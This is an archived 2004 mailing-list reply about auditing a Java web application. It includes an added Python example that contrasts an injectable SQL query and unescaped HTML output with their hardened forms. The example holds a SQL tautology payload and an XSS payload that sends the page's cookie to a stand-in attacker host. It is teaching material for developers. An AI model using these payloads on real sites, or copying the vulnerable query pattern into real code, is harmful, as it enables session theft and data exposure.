Security Basics mailing list archives

RE: Web apps code testing


From: "Yvan Boily" <yboily () seccuris com>
Date: Wed, 17 Mar 2004 17:56:00 -0600

There is no single tool that will grant you security.  What you are looking
for is a code audit, which can be performed internally or by another party.

Ideally you would have other people come in to look at the application (i.e.
experts); however, if you feel confident in your development team's ability to
secure the application then they can perform the audit themselves.

A good way to check if you need outside security auditors is to ask your
developers if they can explain the following to you:

Cross Site Scripting & SQL injection attacks
Session Hijacking
Race conditions
Access controls and Security models which have been implemented
Role of encryption in the application (above and beyond SSL between the
browser and the web server)

If they cannot confidently offer an explanation of each of them, and
measures that they have taken to prevent them, then I seriously doubt their
capability to ensure that the application is secure.

I would also expect them to have the following given that they are using
Java, and resources related to this are easily identifiable:
Risks of RMI and related technologies in web based applications.
A report of how they dealt with issues such as those outlined in OWASP.
Hardening recommendations for the host environment.

Regards,
Yvan Boily
Information Security Analyst
Seccuris 
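
An added example, not part of Yvan's message or of the thread's code: the first
item on the list above (cross-site scripting and SQL injection) shown as a
vulnerable user lookup next to its hardened form. It is written in Python with
the standard-library sqlite3 module so that it runs stand-alone without a
database server; the table contents, the payloads and the function names are
constructed for illustration. The Java equivalent of the bound parameter is
java.sql.PreparedStatement, and of the output escaping, an HTML encoder applied
at the point where the value is written into the page.

```python
"""SQL injection and XSS: vulnerable and hardened versions of a user lookup.

Added example for the Security Basics thread; not code from the thread.
An in-memory SQLite table stands in for the application's real data store.
"""
import html
import sqlite3


def make_db():
    """Constructed sample table: two users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT, bio TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "admin", "Runs the site"),
         ("bob", "user", "<b>Bob</b> & co.")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """String concatenation: attacker-controlled input becomes SQL syntax."""
    sql = "SELECT name, role, bio FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Bound parameter: the input is only ever compared as data.

    The Java counterpart is PreparedStatement.setString(1, name).
    """
    sql = "SELECT name, role, bio FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def vulnerable_raises(conn, name):
    """True when the concatenated query is not even valid SQL.

    The same defect that lets an attacker in also breaks on legitimate
    names containing an apostrophe, which is a useful thing to show a
    developer who claims the concatenation is harmless.
    """
    try:
        lookup_vulnerable(conn, name)
        return False
    except sqlite3.Error:
        return True


def render_unescaped(bio):
    """Reflects stored data straight into HTML: stored XSS if bio is hostile."""
    return "<p>" + bio + "</p>"


def render_escaped(bio):
    """Encodes <, >, &, quotes so the browser treats the value as text only."""
    return "<p>" + html.escape(bio, quote=True) + "</p>"


# Constructed payloads.
SQLI_PAYLOAD = "x' OR '1'='1"          # tautology: matches every row
XSS_BIO = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
LEGIT_NAME = "O'Brien"                 # ordinary name that breaks the naive query


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, tautology :", lookup_vulnerable(conn, SQLI_PAYLOAD))
    print("parameterized, same   :", lookup_parameterized(conn, SQLI_PAYLOAD))
    print("vulnerable, O'Brien   : raises =", vulnerable_raises(conn, LEGIT_NAME))
    print("parameterized, O'Brien:", lookup_parameterized(conn, LEGIT_NAME))
    print("unescaped :", render_unescaped(XSS_BIO))
    print("escaped   :", render_escaped(XSS_BIO))
```

The tautology payload returns both users (including the admin row) from the
concatenated query and nothing from the parameterized one; the same hardened
query also handles O'Brien, which the concatenated version cannot even parse.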

-----Original Message-----
From: Marty [mailto:groupecci () yahoo ca] 
Sent: Tuesday, March 16, 2004 6:51 PM
To: Sec Basic
Subject: Web apps code testing

Hi,

I have the complete code (Java) for a website our development team just
completed.

Is there a tool I can use to make sure the code is secure?

Thanks!

Marty


---------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
any course! All of our class sizes are guaranteed to be 10 students or less
to facilitate one-on-one interaction with one of our expert instructors. 
Attend a course taught by an expert instructor with years of in-the-field
pen testing experience in our state of the art hacking lab. Master the
skills of an Ethical Hacker to better assess the security of your
organization. 
Visit us at: 
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
----------------------------------------------------------------------------
